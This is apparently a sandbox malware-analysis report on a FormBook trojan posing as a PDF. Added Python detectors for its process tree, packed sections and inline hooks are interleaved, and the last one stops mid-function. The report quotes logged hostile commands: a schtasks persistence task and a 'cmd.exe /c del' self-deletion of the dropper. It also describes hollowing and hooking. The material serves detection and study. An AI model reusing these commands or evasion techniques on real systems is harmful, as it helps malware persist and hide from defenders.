Source: INQUIRY 1820521 pdf.exe, 00000000.00000000.643263157.0000000000D52000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690617159.000000000B6A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688107123.0000000009F10000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll" vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690816411.0000000012120000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681042988.0000000003121000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll2 vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.680653424.00000000015D8000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe | Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000006.00000000.674971623.0000000000392000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe | Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000007.00000000.675957885.00000000000A2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe | Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000008.00000000.677042665.00000000001D2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe | Binary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000009.00000000.678299200.0000000000942000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000009.00000002.728306510.00000000017BF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727314494.0000000001437000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe | Binary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
Source: INQUIRY 1820521 pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: INQUIRY 1820521 pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: YAhcdYrYHFkNNf.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@17/4@3/3
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | File created: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\EzfyYQgyGpxJcXHkudBezpt
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | File created: C:\Users\user\AppData\Local\Temp\tmp7085.tmp
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: INQUIRY 1820521 pdf.exe | Virustotal: Detection: 39%
Source: INQUIRY 1820521 pdf.exe | Metadefender: Detection: 13%
Source: INQUIRY 1820521 pdf.exe | ReversingLabs: Detection: 41%
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | File read: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
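The process tree above is the behavioural chain worth matching on endpoint telemetry: schtasks.exe registering a task from an XML file in the user's temp folder, the sample relaunching its own image (the suspended-process hollowing the report flags), the injected explorer.exe starting 32-bit system utilities (autochk.exe, ipconfig.exe) with empty argument lists, and ipconfig.exe running cmd.exe /c del on the original dropper. The block below is an added example, not part of the Joe Sandbox report: it runs four such checks over a constructed set of Sysmon-style process-creation events modelled on the tree. Only PID 6928 comes from the report; the other PIDs and the benign schtasks control event are invented for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon Event ID 1 style records modelled on the report's process
# tree. Only PID 6928 is from the report; the other PIDs are invented, as is the
# benign schtasks event at the end, which acts as a control.
EVENTS: List[Dict] = [
    {"pid": 4000, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 6928, "ppid": 4000, "image": r"C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe",
     "cmdline": r'"C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe"'},
    {"pid": 5001, "ppid": 6928, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YAhcdYrYHFkNNf" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmp7085.tmp"'},
    {"pid": 5002, "ppid": 6928, "image": r"C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe",
     "cmdline": r"C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe"},
    {"pid": 5003, "ppid": 4000, "image": r"C:\Windows\SysWOW64\ipconfig.exe",
     "cmdline": r"C:\Windows\SysWOW64\ipconfig.exe"},
    {"pid": 5004, "ppid": 5003, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe"'},
    {"pid": 5005, "ppid": 4000, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\Program Files\Vendor\updater.xml"'},
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
SHELLS = {"explorer.exe", "cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs for the behaviours seen in the report's tree."""
    by_pid = {e["pid"]: e for e in events}
    hits: List[Tuple[str, int]] = []
    for e in events:
        image, cmd = e["image"], e["cmdline"]
        name, lowered = basename(image), cmd.lower()
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        # 1. Task registered from an XML definition dropped in the user's temp
        #    folder (the report's "Scheduled temp file as task from temp location").
        if name == "schtasks.exe" and "/create" in lowered and "/xml" in lowered and TEMP_DIR.search(cmd):
            hits.append(("schtasks_xml_from_temp", e["pid"]))
        # 2. A process starting a fresh copy of its own image: the staging step
        #    for the suspended-process hollowing the report flags.
        if parent and parent["image"].lower() == image.lower():
            hits.append(("self_spawn", e["pid"]))
        # 3. explorer.exe starting a 32-bit system utility with an empty argument
        #    list (autochk.exe / ipconfig.exe here): the injected explorer picks a
        #    hollowing target that is normally never launched this way.
        if pname == "explorer.exe" and "\\syswow64\\" in image.lower() and lowered.strip() == image.lower():
            hits.append(("explorer_spawns_syswow64_utility", e["pid"]))
        # 4. cmd.exe /c del launched by something that is not a shell: the
        #    self-delete of the original dropper from the injected utility.
        if name == "cmd.exe" and re.search(r"/c\s+del\b", lowered) and pname and pname not in SHELLS:
            hits.append(("self_delete_via_cmd", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:36} pid={pid}")
```

Rule 3 is a heuristic: explorer.exe legitimately launches many programs, so it is scoped to WOW64 utilities with no arguments and should be correlated with the injection signals, not used alone. Rule 1 fires before the XML is deleted; to learn what the task actually runs (here the copy in AppData\Roaming), the tmp file must be captured at creation time or the task read back from the Task Scheduler store.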
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: INQUIRY 1820521 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: INQUIRY 1820521 pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INQUIRY 1820521 pdf.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_00D527CF push 00000052h; iretd 0_2_00D527DF
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 0_2_00D5269E push ds; iretd 0_2_00D526AC
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 6_2_0039269E push ds; iretd 6_2_003926AC
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 6_2_003927CF push 00000052h; iretd 6_2_003927DF
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 7_2_000A269E push ds; iretd 7_2_000A26AC
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 7_2_000A27CF push 00000052h; iretd 7_2_000A27DF
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 8_2_001D269E push ds; iretd 8_2_001D26AC
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 8_2_001D27CF push 00000052h; iretd 8_2_001D27DF
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0040CBD4 push ds; iretd 9_2_0040CBDF
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0041CEB5 push eax; ret 9_2_0041CF08
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0041CF6C push eax; ret 9_2_0041CF72
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0041CF02 push eax; ret 9_2_0041CF08
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0041CF0B push eax; ret 9_2_0041CF72
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0041CFBA push eax; ret 9_2_0041CF72
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0094269E push ds; iretd 9_2_009426AC
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_009427CF push 00000052h; iretd 9_2_009427DF
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0158D0D1 push ecx; ret 9_2_0158D0E4
Source: C:\Windows\explorer.exe | Code function: 10_2_04DFE3E6 pushad ; ret 10_2_04DFE3E7
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032CD0D1 push ecx; ret 16_2_032CD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A0CBD4 push ds; iretd 16_2_00A0CBDF
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A1CEB5 push eax; ret 16_2_00A1CF08
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A1CFBA push eax; ret 16_2_00A1CF72
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A1CF02 push eax; ret 16_2_00A1CF08
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A1CF0B push eax; ret 16_2_00A1CF72
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_00A1CF6C push eax; ret 16_2_00A1CF72
Source: initial sample | Static PE information: section name: .text entropy: 7.49655840913
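The report flags the sample's .text section at entropy 7.4966. An executable section that close to 8 bits per byte holds compressed or encrypted data rather than compiled code, which fits a .NET crypter stub carrying the FormBook payload that is later unpacked and injected. The block below is an added example, not part of the report or of any Joe Sandbox tooling: it walks a PE section table with the standard library only, computes Shannon entropy per section and flags executable sections above a threshold. The PE it analyses is constructed inside the block (a minimal header and one .text section filled from a seeded PRNG) so that it runs offline; the 7.0 threshold is a common rule of thumb, not a value taken from the report.

```python
import math
import random
import struct
from typing import List, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes) -> List[Tuple[str, int, bytes]]:
    """Walk the section table of a PE file: (name, characteristics, raw bytes)."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]       # COFF NumberOfSections
    size_of_optional = struct.unpack_from("<H", image, e_lfanew + 20)[0]  # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + size_of_optional                              # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                                              # IMAGE_SECTION_HEADER is 40 bytes
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", image, off + 8)
        characteristics = struct.unpack_from("<I", image, off + 36)[0]
        sections.append((name, characteristics, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def packed_code_sections(image: bytes, threshold: float = 7.0) -> List[Tuple[str, float]]:
    """Executable sections whose entropy suggests packed or encrypted content."""
    out = []
    for name, flags, raw in pe_sections(image):
        if flags & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE):
            ent = shannon_entropy(raw)
            if ent >= threshold:
                out.append((name, round(ent, 3)))
    return out


def build_test_pe(text: bytes) -> bytes:
    """Constructed minimal PE32 with a single .text section; not a real binary."""
    e_lfanew = 0x80
    size_of_optional = 0xE0                      # size of a PE32 optional header
    raw_ptr = 0x200                              # first file-aligned offset after the headers
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, size_of_optional, 0x0102)
    optional = b"\0" * size_of_optional          # contents are not needed by pe_sections
    flags = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ  # the report's .text flags
    section = (b".text".ljust(8, b"\0")
               + struct.pack("<IIII", len(text), 0x1000, len(text), raw_ptr)
               + struct.pack("<IIHHI", 0, 0, 0, 0, flags))
    headers = dos + coff + optional + section
    assert len(headers) <= raw_ptr
    return headers.ljust(raw_ptr, b"\0") + text


# Constructed section contents: a seeded PRNG stream stands in for a crypter's
# encrypted payload, a 16-symbol pattern for ordinary low-entropy code.
_rng = random.Random(1820521)
PACKED_TEXT = bytes(_rng.randrange(256) for _ in range(16384))
PLAIN_TEXT = bytes(range(16)) * 1024

if __name__ == "__main__":
    for label, text in (("packed", PACKED_TEXT), ("plain", PLAIN_TEXT)):
        print(label, packed_code_sections(build_test_pe(text)))
```

Entropy alone does not separate malware from legitimately packed or signed installers; it is a triage signal to combine with the other static facts the report lists for this file (a .NET image with a COM descriptor directory whose .text section is nearly incompressible).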

          Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | File created: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe

          Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x88 0x8E 0xE3
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process information set: NOOPENFILEERRORBOX (45 identical entries in the report)
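An inline hook overwrites the first bytes of an exported function inside a process so that every caller is diverted to the injected code; here the report finds the prologue of user32!PeekMessageA rewritten inside explorer.exe, a function explorer calls continuously from its message loop, so the injected body runs on explorer's own threads. The sandbox detects it exactly as a scanner would: compare the bytes in the live process against the pristine image. The block below is an added example, not code from the report: given a function's address, its pristine first bytes and the bytes found in memory, it names the trampoline shape and recovers the jump target for the common forms. The pristine prologue is constructed (a typical x64 `sub rsp, 28h`); the six bytes the report prints do not match any of these shapes, so they come back as an unclassified modification.

```python
import struct
from typing import Optional, Tuple


def classify_hook(func_va: int, pristine: bytes, current: bytes, x64: bool = True) -> Tuple[str, Optional[int]]:
    """Compare a function's first bytes in a live process with the pristine copy
    (the on-disk image after relocation) and name the patch. Returns (kind, target)."""
    if current[:len(pristine)] == pristine:
        return ("clean", None)
    b = current
    mask = (1 << 64) - 1 if x64 else (1 << 32) - 1
    if len(b) >= 5 and b[0] == 0xE9:                                        # jmp rel32
        rel = struct.unpack_from("<i", b, 1)[0]
        return ("jmp_rel32", (func_va + 5 + rel) & mask)
    if len(b) >= 6 and b[:2] == b"\xFF\x25":                                # jmp [ptr]
        disp = struct.unpack_from("<i", b, 2)[0]
        slot = (func_va + 6 + disp) & mask if x64 else disp & mask          # RIP-relative on x64, absolute on x86
        return ("jmp_indirect_slot", slot)
    if len(b) >= 6 and b[0] == 0x68 and b[5] == 0xC3:                       # push imm32; ret
        return ("push_ret", struct.unpack_from("<I", b, 1)[0])
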